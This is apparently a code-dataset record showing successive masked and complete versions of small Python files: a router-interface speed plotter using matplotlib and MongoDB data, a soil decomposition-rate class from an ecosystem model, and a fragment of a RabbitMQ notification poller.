"step-5": "import calendar\nimport json\nfrom datetime import datetime\nfrom datapoller.download import download\nfrom datapoller.settings import *\nfrom messaging.Messaging import sendMessage\nfrom messaging.settings import RABBIT_NOTIFY_QUEUE\nfrom sessioncontroller.utils import is_level_interesting_for_kp\n\n__author__ = 'arik'\n\nsharedDict = {}\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\ndef updateModel():\n (lastLevels, validTime) = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and \\\n getTimestamp(validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(\n RABBIT_NOTIFY_QUEUE,\n json.dumps({\"time\": getTimestamp(validTime), \"geo\": geo, \"chat_id\": chat_id, \"level\": level, \"bot\": bot})\n )\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-ids": [
3,
4,
5,
6,
8
]
}
|
[
3,
4,
5,
6,
8
] |
<|reserved_special_token_0|>
def mat_line(speed_time_info, interface, direction, last_time):
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111)
import matplotlib.dates as mdate
ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))
import matplotlib.ticker as mtick
ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))
x = []
y = []
for time, speed in speed_time_info:
x.append(time)
y.append(speed)
plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time
) + '分钟速率')
plt.xlabel('采集时间')
plt.ylabel('速率kbps')
fig.autofmt_xdate()
ax.plot(x, y, linestyle='solid', color='r', label='R1')
ax.legend(loc='upper left')
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mat_line(speed_time_info, interface, direction, last_time):
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111)
import matplotlib.dates as mdate
ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))
import matplotlib.ticker as mtick
ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))
x = []
y = []
for time, speed in speed_time_info:
x.append(time)
y.append(speed)
plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time
) + '分钟速率')
plt.xlabel('采集时间')
plt.ylabel('速率kbps')
fig.autofmt_xdate()
ax.plot(x, y, linestyle='solid', color='r', label='R1')
ax.legend(loc='upper left')
plt.show()
if __name__ == '__main__':
list_info = ['GigabitEthernet1', 'out', 2]
time_recode, speed = get_info_from_mongodb(*list_info)
speed_time_info = list(zip(time_recode, speed))
mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['font.family'] = 'sans-serif'
def mat_line(speed_time_info, interface, direction, last_time):
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111)
import matplotlib.dates as mdate
ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))
import matplotlib.ticker as mtick
ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))
x = []
y = []
for time, speed in speed_time_info:
x.append(time)
y.append(speed)
plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time
) + '分钟速率')
plt.xlabel('采集时间')
plt.ylabel('速率kbps')
fig.autofmt_xdate()
ax.plot(x, y, linestyle='solid', color='r', label='R1')
ax.legend(loc='upper left')
plt.show()
if __name__ == '__main__':
list_info = ['GigabitEthernet1', 'out', 2]
time_recode, speed = get_info_from_mongodb(*list_info)
speed_time_info = list(zip(time_recode, speed))
mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])
<|reserved_special_token_1|>
from matplotlib import pyplot as plt
from read_and_calculate_speed import get_info_from_mongodb
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['font.family'] = 'sans-serif'
def mat_line(speed_time_info, interface, direction, last_time):
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111)
import matplotlib.dates as mdate
ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))
import matplotlib.ticker as mtick
ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))
x = []
y = []
for time, speed in speed_time_info:
x.append(time)
y.append(speed)
plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time
) + '分钟速率')
plt.xlabel('采集时间')
plt.ylabel('速率kbps')
fig.autofmt_xdate()
ax.plot(x, y, linestyle='solid', color='r', label='R1')
ax.legend(loc='upper left')
plt.show()
if __name__ == '__main__':
list_info = ['GigabitEthernet1', 'out', 2]
time_recode, speed = get_info_from_mongodb(*list_info)
speed_time_info = list(zip(time_recode, speed))
mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])
<|reserved_special_token_1|>
from matplotlib import pyplot as plt
from read_and_calculate_speed import get_info_from_mongodb
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['font.family'] = 'sans-serif'
def mat_line(speed_time_info, interface, direction, last_time):
    """Plot an interface throughput curve (kbps over time).

    speed_time_info : list of (datetime, speed) samples to draw
    interface       : router interface name, shown in the chart title
    direction       : traffic direction label, shown in the chart title
    last_time       : sampling window length in minutes, shown in the title
    """
    # Figure size in inches (width, height); one row, one column, first plot.
    fig = plt.figure(figsize=(6, 6))
    ax = fig.add_subplot(111)

    # Render x-axis ticks as wall-clock times.
    import matplotlib.dates as mdate
    ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))

    # Render y-axis ticks as plain integers.
    import matplotlib.ticker as mtick
    ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))

    # Split the (time, speed) pairs into the two plot axes.
    x = [sample_time for sample_time, _ in speed_time_info]
    y = [sample_speed for _, sample_speed in speed_time_info]

    # Title and axis labels (kept in Chinese for the target audience).
    plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time) + '分钟速率')
    plt.xlabel('采集时间')
    plt.ylabel('速率kbps')

    # Tilt the time labels so a crowded x-axis stays readable.
    fig.autofmt_xdate()

    # Solid red curve; legend pinned to the upper-left corner.
    ax.plot(x, y, linestyle='solid', color='r', label='R1')
    ax.legend(loc='upper left')
    plt.show()
if __name__ == '__main__':
    # Interface name, traffic direction and window length (minutes) to query.
    query_args = ['GigabitEthernet1', 'out', 2]
    # Fetch the timestamps and speeds recorded during that window.
    time_recode, speed = get_info_from_mongodb(*query_args)
    # Pair timestamps with speeds and draw the throughput curve.
    mat_line(list(zip(time_recode, speed)), query_args[0], query_args[1], query_args[2])
|
flexible
|
{
"blob_id": "0aa419b0045914b066fbec457c918d83276f2583",
"index": 3556,
"step-1": "<mask token>\n\n\ndef mat_line(speed_time_info, interface, direction, last_time):\n fig = plt.figure(figsize=(6, 6))\n ax = fig.add_subplot(111)\n import matplotlib.dates as mdate\n ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))\n import matplotlib.ticker as mtick\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))\n x = []\n y = []\n for time, speed in speed_time_info:\n x.append(time)\n y.append(speed)\n plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time\n ) + '分钟速率')\n plt.xlabel('采集时间')\n plt.ylabel('速率kbps')\n fig.autofmt_xdate()\n ax.plot(x, y, linestyle='solid', color='r', label='R1')\n ax.legend(loc='upper left')\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef mat_line(speed_time_info, interface, direction, last_time):\n fig = plt.figure(figsize=(6, 6))\n ax = fig.add_subplot(111)\n import matplotlib.dates as mdate\n ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))\n import matplotlib.ticker as mtick\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))\n x = []\n y = []\n for time, speed in speed_time_info:\n x.append(time)\n y.append(speed)\n plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time\n ) + '分钟速率')\n plt.xlabel('采集时间')\n plt.ylabel('速率kbps')\n fig.autofmt_xdate()\n ax.plot(x, y, linestyle='solid', color='r', label='R1')\n ax.legend(loc='upper left')\n plt.show()\n\n\nif __name__ == '__main__':\n list_info = ['GigabitEthernet1', 'out', 2]\n time_recode, speed = get_info_from_mongodb(*list_info)\n speed_time_info = list(zip(time_recode, speed))\n mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])\n",
"step-3": "<mask token>\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['font.family'] = 'sans-serif'\n\n\ndef mat_line(speed_time_info, interface, direction, last_time):\n fig = plt.figure(figsize=(6, 6))\n ax = fig.add_subplot(111)\n import matplotlib.dates as mdate\n ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))\n import matplotlib.ticker as mtick\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))\n x = []\n y = []\n for time, speed in speed_time_info:\n x.append(time)\n y.append(speed)\n plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time\n ) + '分钟速率')\n plt.xlabel('采集时间')\n plt.ylabel('速率kbps')\n fig.autofmt_xdate()\n ax.plot(x, y, linestyle='solid', color='r', label='R1')\n ax.legend(loc='upper left')\n plt.show()\n\n\nif __name__ == '__main__':\n list_info = ['GigabitEthernet1', 'out', 2]\n time_recode, speed = get_info_from_mongodb(*list_info)\n speed_time_info = list(zip(time_recode, speed))\n mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])\n",
"step-4": "from matplotlib import pyplot as plt\nfrom read_and_calculate_speed import get_info_from_mongodb\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['font.family'] = 'sans-serif'\n\n\ndef mat_line(speed_time_info, interface, direction, last_time):\n fig = plt.figure(figsize=(6, 6))\n ax = fig.add_subplot(111)\n import matplotlib.dates as mdate\n ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))\n import matplotlib.ticker as mtick\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))\n x = []\n y = []\n for time, speed in speed_time_info:\n x.append(time)\n y.append(speed)\n plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time\n ) + '分钟速率')\n plt.xlabel('采集时间')\n plt.ylabel('速率kbps')\n fig.autofmt_xdate()\n ax.plot(x, y, linestyle='solid', color='r', label='R1')\n ax.legend(loc='upper left')\n plt.show()\n\n\nif __name__ == '__main__':\n list_info = ['GigabitEthernet1', 'out', 2]\n time_recode, speed = get_info_from_mongodb(*list_info)\n speed_time_info = list(zip(time_recode, speed))\n mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])\n",
"step-5": "from matplotlib import pyplot as plt\nfrom read_and_calculate_speed import get_info_from_mongodb\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['font.family'] = 'sans-serif'\n\n\ndef mat_line(speed_time_info, interface, direction, last_time):\n # 调节图形大小,宽,高\n fig = plt.figure(figsize=(6, 6))\n # 一共一行,每行一图,第一图\n ax = fig.add_subplot(111)\n\n # 处理X轴时间格式\n import matplotlib.dates as mdate\n\n # 设置时间标签显示格式\n # ax.xaxis.set_major_formatter(mdate.DateFormatter('%Y-%m-%d %H:%M:%S'))\n ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))\n\n # 处理Y轴百分比格式\n import matplotlib.ticker as mtick\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))\n # ax.set_ylim(0, 100) # 控制Y轴的取值范围\n\n # 把cpu_usage_list的数据,拆分为x轴的时间,与y轴的利用率\n x = []\n y = []\n\n for time, speed in speed_time_info:\n x.append(time)\n y.append(speed)\n\n # 添加主题和注释\n plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time) + '分钟速率')\n plt.xlabel('采集时间')\n plt.ylabel('速率kbps')\n\n # 当x轴太拥挤的时候可以让他自适应\n fig.autofmt_xdate()\n\n # 实线红色\n ax.plot(x, y, linestyle='solid', color='r', label='R1')\n # 虚线黑色\n # ax.plot(x, y, linestyle='dashed', color='b', label='R1')\n\n # 如果你有两套数据,完全可以在一幅图中绘制双线\n # ax.plot(x2, y2, linestyle='dashed', color='b', label='R1')\n\n # 设置说明的位置\n ax.legend(loc='upper left')\n\n # 绘制图形\n plt.show()\n\n\nif __name__ == '__main__':\n list_info = ['GigabitEthernet1', 'out', 2]\n # 获取数据库两分钟内的信息\n time_recode, speed = get_info_from_mongodb(*list_info)\n speed_time_info = list(zip(time_recode, speed))\n # 绘图\n mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class DecompFactors(object):
<|reserved_special_token_0|>
def __init__(self, control, params, state, fluxes, met_data):
"""
Parameters
----------
control : integers, structure
model control flags
params: floats, structure
model parameters
state: floats, structure
model state
fluxes : floats, structure
model fluxes
met_data : floats, dictionary
meteorological forcing data
"""
self.params = params
self.fluxes = fluxes
self.control = control
self.state = state
self.met_data = met_data
self.wb = WaterBalance(self.control, self.params, self.state, self.
fluxes, self.met_data)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DecompFactors(object):
""" Calculate C and N litter production rates """
def __init__(self, control, params, state, fluxes, met_data):
"""
Parameters
----------
control : integers, structure
model control flags
params: floats, structure
model parameters
state: floats, structure
model state
fluxes : floats, structure
model fluxes
met_data : floats, dictionary
meteorological forcing data
"""
self.params = params
self.fluxes = fluxes
self.control = control
self.state = state
self.met_data = met_data
self.wb = WaterBalance(self.control, self.params, self.state, self.
fluxes, self.met_data)
def decay_rates(self, project_day):
""" Model decay rates - temperature dependency (i.e. increase with temp)
[See section A8 in Comins and McMurtrie 1993].
Parameters:
-----------
project_day : int
current simulation day (index)
"""
tempact = self.soil_temp_factor(project_day)
wtfac = self.wb.calculate_soil_water_fac(topsoil=True)
self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self
.params.ligshoot) * tempact * wtfac
self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac
self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self
.params.ligroot) * tempact * wtfac
self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac
self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.
params.finesoil) * tempact * wtfac
self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac
self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac
def soil_temp_factor(self, project_day):
"""Soil-temperature activity factor (A9).
Parameters:
-----------
project_day : int
current simulation day (index)
Returns:
--------
tfac : float
soil temperature factor [degC]
"""
tsoil = self.met_data['tsoil'][project_day]
if float_gt(tsoil, 0.0):
tfac = 0.0326 + 0.00351 * tsoil ** 1.652 - (tsoil / 41.748) ** 7.19
if float_lt(tfac, 0.0):
tfac = 0.0
else:
tfac = 0.0
return tfac
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__author__ = 'Martin De Kauwe'
__version__ = '1.0 (25.02.2011)'
__email__ = 'mdekauwe@gmail.com'
class DecompFactors(object):
""" Calculate C and N litter production rates """
def __init__(self, control, params, state, fluxes, met_data):
"""
Parameters
----------
control : integers, structure
model control flags
params: floats, structure
model parameters
state: floats, structure
model state
fluxes : floats, structure
model fluxes
met_data : floats, dictionary
meteorological forcing data
"""
self.params = params
self.fluxes = fluxes
self.control = control
self.state = state
self.met_data = met_data
self.wb = WaterBalance(self.control, self.params, self.state, self.
fluxes, self.met_data)
def decay_rates(self, project_day):
""" Model decay rates - temperature dependency (i.e. increase with temp)
[See section A8 in Comins and McMurtrie 1993].
Parameters:
-----------
project_day : int
current simulation day (index)
"""
tempact = self.soil_temp_factor(project_day)
wtfac = self.wb.calculate_soil_water_fac(topsoil=True)
self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self
.params.ligshoot) * tempact * wtfac
self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac
self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self
.params.ligroot) * tempact * wtfac
self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac
self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.
params.finesoil) * tempact * wtfac
self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac
self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac
def soil_temp_factor(self, project_day):
"""Soil-temperature activity factor (A9).
Parameters:
-----------
project_day : int
current simulation day (index)
Returns:
--------
tfac : float
soil temperature factor [degC]
"""
tsoil = self.met_data['tsoil'][project_day]
if float_gt(tsoil, 0.0):
tfac = 0.0326 + 0.00351 * tsoil ** 1.652 - (tsoil / 41.748) ** 7.19
if float_lt(tfac, 0.0):
tfac = 0.0
else:
tfac = 0.0
return tfac
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import math
from water_balance import WaterBalance
from utilities import float_eq, float_lt, float_le, float_gt, float_ge, clip
__author__ = 'Martin De Kauwe'
__version__ = '1.0 (25.02.2011)'
__email__ = 'mdekauwe@gmail.com'
class DecompFactors(object):
""" Calculate C and N litter production rates """
def __init__(self, control, params, state, fluxes, met_data):
"""
Parameters
----------
control : integers, structure
model control flags
params: floats, structure
model parameters
state: floats, structure
model state
fluxes : floats, structure
model fluxes
met_data : floats, dictionary
meteorological forcing data
"""
self.params = params
self.fluxes = fluxes
self.control = control
self.state = state
self.met_data = met_data
self.wb = WaterBalance(self.control, self.params, self.state, self.
fluxes, self.met_data)
def decay_rates(self, project_day):
""" Model decay rates - temperature dependency (i.e. increase with temp)
[See section A8 in Comins and McMurtrie 1993].
Parameters:
-----------
project_day : int
current simulation day (index)
"""
tempact = self.soil_temp_factor(project_day)
wtfac = self.wb.calculate_soil_water_fac(topsoil=True)
self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self
.params.ligshoot) * tempact * wtfac
self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac
self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self
.params.ligroot) * tempact * wtfac
self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac
self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.
params.finesoil) * tempact * wtfac
self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac
self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac
def soil_temp_factor(self, project_day):
"""Soil-temperature activity factor (A9).
Parameters:
-----------
project_day : int
current simulation day (index)
Returns:
--------
tfac : float
soil temperature factor [degC]
"""
tsoil = self.met_data['tsoil'][project_day]
if float_gt(tsoil, 0.0):
tfac = 0.0326 + 0.00351 * tsoil ** 1.652 - (tsoil / 41.748) ** 7.19
if float_lt(tfac, 0.0):
tfac = 0.0
else:
tfac = 0.0
return tfac
<|reserved_special_token_1|>
""" Soil and water decomposition rates """
import math
from water_balance import WaterBalance
from utilities import float_eq, float_lt, float_le, float_gt, float_ge, clip
__author__ = "Martin De Kauwe"
__version__ = "1.0 (25.02.2011)"
__email__ = "mdekauwe@gmail.com"
class DecompFactors(object):
    """ Calculate C and N litter production rates """

    def __init__(self, control, params, state, fluxes, met_data):
        """
        Parameters
        ----------
        control : integers, structure
            model control flags
        params: floats, structure
            model parameters
        state: floats, structure
            model state
        fluxes : floats, structure
            model fluxes
        met_data : floats, dictionary
            meteorological forcing data

        """
        self.control = control
        self.params = params
        self.state = state
        self.fluxes = fluxes
        self.met_data = met_data
        # Water-balance model supplies the soil-moisture decomposition factor.
        self.wb = WaterBalance(self.control, self.params, self.state,
                               self.fluxes, self.met_data)

    def decay_rates(self, project_day):
        """ Model decay rates - temperature dependency (i.e. increase with temp)
        [See section A8 in Comins and McMurtrie 1993].

        Parameters:
        -----------
        project_day : int
            current simulation day (index)

        """
        # Temperature and moisture modifiers shared by every pool.
        tempact = self.soil_temp_factor(project_day)
        wtfac = self.wb.calculate_soil_water_fac(topsoil=True)
        # Lignin shielding slows decay of the structural litter pools.
        shoot_lignin = math.exp(-3. * self.params.ligshoot)
        root_lignin = math.exp(-3. * self.params.ligroot)

        # surface structural pool
        self.params.decayrate[0] = (self.params.kdec1 * shoot_lignin *
                                    tempact * wtfac)
        # surface metabolic pool
        self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac
        # soil structural pool
        self.params.decayrate[2] = (self.params.kdec3 * root_lignin *
                                    tempact * wtfac)
        # soil metabolic pool
        self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac
        # active pool -- scaled down on fine-textured soils
        self.params.decayrate[4] = (self.params.kdec5 *
                                    (1.0 - 0.75 * self.params.finesoil) *
                                    tempact * wtfac)
        # slow pool
        self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac
        # passive pool
        self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac

    def soil_temp_factor(self, project_day):
        """Soil-temperature activity factor (A9).

        Parameters:
        -----------
        project_day : int
            current simulation day (index)

        Returns:
        --------
        tfac : float
            soil temperature factor [degC]

        """
        tsoil = self.met_data['tsoil'][project_day]
        # A negative temperature cannot be raised to a fractional power
        # (the result would be complex), so activity is zero at or below 0 degC.
        if not float_gt(tsoil, 0.0):
            return 0.0
        tfac = 0.0326 + 0.00351 * tsoil**1.652 - (tsoil / 41.748)**7.19
        # The polynomial dips below zero at high temperatures; clamp it.
        return 0.0 if float_lt(tfac, 0.0) else tfac
|
flexible
|
{
"blob_id": "74f3b4001a0520a25a314ff537719b679ba0fca4",
"index": 2578,
"step-1": "<mask token>\n\n\nclass DecompFactors(object):\n <mask token>\n\n def __init__(self, control, params, state, fluxes, met_data):\n \"\"\"\n Parameters\n ----------\n control : integers, structure\n model control flags\n params: floats, structure\n model parameters\n state: floats, structure\n model state\n fluxes : floats, structure\n model fluxes\n met_data : floats, dictionary\n meteorological forcing data\n\n \"\"\"\n self.params = params\n self.fluxes = fluxes\n self.control = control\n self.state = state\n self.met_data = met_data\n self.wb = WaterBalance(self.control, self.params, self.state, self.\n fluxes, self.met_data)\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass DecompFactors(object):\n \"\"\" Calculate C and N litter production rates \"\"\"\n\n def __init__(self, control, params, state, fluxes, met_data):\n \"\"\"\n Parameters\n ----------\n control : integers, structure\n model control flags\n params: floats, structure\n model parameters\n state: floats, structure\n model state\n fluxes : floats, structure\n model fluxes\n met_data : floats, dictionary\n meteorological forcing data\n\n \"\"\"\n self.params = params\n self.fluxes = fluxes\n self.control = control\n self.state = state\n self.met_data = met_data\n self.wb = WaterBalance(self.control, self.params, self.state, self.\n fluxes, self.met_data)\n\n def decay_rates(self, project_day):\n \"\"\" Model decay rates - temperature dependency (i.e. increase with temp)\n [See section A8 in Comins and McMurtrie 1993].\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n \"\"\"\n tempact = self.soil_temp_factor(project_day)\n wtfac = self.wb.calculate_soil_water_fac(topsoil=True)\n self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self\n .params.ligshoot) * tempact * wtfac\n self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac\n self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self\n .params.ligroot) * tempact * wtfac\n self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac\n self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.\n params.finesoil) * tempact * wtfac\n self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac\n self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac\n\n def soil_temp_factor(self, project_day):\n \"\"\"Soil-temperature activity factor (A9).\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n Returns:\n --------\n tfac : float\n soil temperature factor [degC]\n\n \"\"\"\n tsoil = self.met_data['tsoil'][project_day]\n if float_gt(tsoil, 0.0):\n tfac = 0.0326 + 0.00351 * 
tsoil ** 1.652 - (tsoil / 41.748) ** 7.19\n if float_lt(tfac, 0.0):\n tfac = 0.0\n else:\n tfac = 0.0\n return tfac\n",
"step-3": "<mask token>\n__author__ = 'Martin De Kauwe'\n__version__ = '1.0 (25.02.2011)'\n__email__ = 'mdekauwe@gmail.com'\n\n\nclass DecompFactors(object):\n \"\"\" Calculate C and N litter production rates \"\"\"\n\n def __init__(self, control, params, state, fluxes, met_data):\n \"\"\"\n Parameters\n ----------\n control : integers, structure\n model control flags\n params: floats, structure\n model parameters\n state: floats, structure\n model state\n fluxes : floats, structure\n model fluxes\n met_data : floats, dictionary\n meteorological forcing data\n\n \"\"\"\n self.params = params\n self.fluxes = fluxes\n self.control = control\n self.state = state\n self.met_data = met_data\n self.wb = WaterBalance(self.control, self.params, self.state, self.\n fluxes, self.met_data)\n\n def decay_rates(self, project_day):\n \"\"\" Model decay rates - temperature dependency (i.e. increase with temp)\n [See section A8 in Comins and McMurtrie 1993].\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n \"\"\"\n tempact = self.soil_temp_factor(project_day)\n wtfac = self.wb.calculate_soil_water_fac(topsoil=True)\n self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self\n .params.ligshoot) * tempact * wtfac\n self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac\n self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self\n .params.ligroot) * tempact * wtfac\n self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac\n self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.\n params.finesoil) * tempact * wtfac\n self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac\n self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac\n\n def soil_temp_factor(self, project_day):\n \"\"\"Soil-temperature activity factor (A9).\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n Returns:\n --------\n tfac : float\n soil temperature factor [degC]\n\n \"\"\"\n 
tsoil = self.met_data['tsoil'][project_day]\n if float_gt(tsoil, 0.0):\n tfac = 0.0326 + 0.00351 * tsoil ** 1.652 - (tsoil / 41.748) ** 7.19\n if float_lt(tfac, 0.0):\n tfac = 0.0\n else:\n tfac = 0.0\n return tfac\n",
"step-4": "<mask token>\nimport math\nfrom water_balance import WaterBalance\nfrom utilities import float_eq, float_lt, float_le, float_gt, float_ge, clip\n__author__ = 'Martin De Kauwe'\n__version__ = '1.0 (25.02.2011)'\n__email__ = 'mdekauwe@gmail.com'\n\n\nclass DecompFactors(object):\n \"\"\" Calculate C and N litter production rates \"\"\"\n\n def __init__(self, control, params, state, fluxes, met_data):\n \"\"\"\n Parameters\n ----------\n control : integers, structure\n model control flags\n params: floats, structure\n model parameters\n state: floats, structure\n model state\n fluxes : floats, structure\n model fluxes\n met_data : floats, dictionary\n meteorological forcing data\n\n \"\"\"\n self.params = params\n self.fluxes = fluxes\n self.control = control\n self.state = state\n self.met_data = met_data\n self.wb = WaterBalance(self.control, self.params, self.state, self.\n fluxes, self.met_data)\n\n def decay_rates(self, project_day):\n \"\"\" Model decay rates - temperature dependency (i.e. 
increase with temp)\n [See section A8 in Comins and McMurtrie 1993].\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n \"\"\"\n tempact = self.soil_temp_factor(project_day)\n wtfac = self.wb.calculate_soil_water_fac(topsoil=True)\n self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self\n .params.ligshoot) * tempact * wtfac\n self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac\n self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self\n .params.ligroot) * tempact * wtfac\n self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac\n self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.\n params.finesoil) * tempact * wtfac\n self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac\n self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac\n\n def soil_temp_factor(self, project_day):\n \"\"\"Soil-temperature activity factor (A9).\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n Returns:\n --------\n tfac : float\n soil temperature factor [degC]\n\n \"\"\"\n tsoil = self.met_data['tsoil'][project_day]\n if float_gt(tsoil, 0.0):\n tfac = 0.0326 + 0.00351 * tsoil ** 1.652 - (tsoil / 41.748) ** 7.19\n if float_lt(tfac, 0.0):\n tfac = 0.0\n else:\n tfac = 0.0\n return tfac\n",
"step-5": "\"\"\" Soil and water decomposition rates \"\"\"\n\nimport math\n\nfrom water_balance import WaterBalance\nfrom utilities import float_eq, float_lt, float_le, float_gt, float_ge, clip\n\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (25.02.2011)\"\n__email__ = \"mdekauwe@gmail.com\"\n\n\nclass DecompFactors(object):\n \"\"\" Calculate C and N litter production rates \"\"\"\n def __init__(self, control, params, state, fluxes, met_data):\n \"\"\"\n Parameters\n ----------\n control : integers, structure\n model control flags\n params: floats, structure\n model parameters\n state: floats, structure\n model state\n fluxes : floats, structure\n model fluxes\n met_data : floats, dictionary\n meteorological forcing data\n\n \"\"\"\n self.params = params\n self.fluxes = fluxes\n self.control = control\n self.state = state\n self.met_data = met_data\n\n self.wb = WaterBalance(self.control, self.params, self.state,\n self.fluxes, self.met_data)\n\n def decay_rates(self, project_day):\n \"\"\" Model decay rates - temperature dependency (i.e. increase with temp)\n [See section A8 in Comins and McMurtrie 1993].\n\n Parameters:\n -----------\n project_day 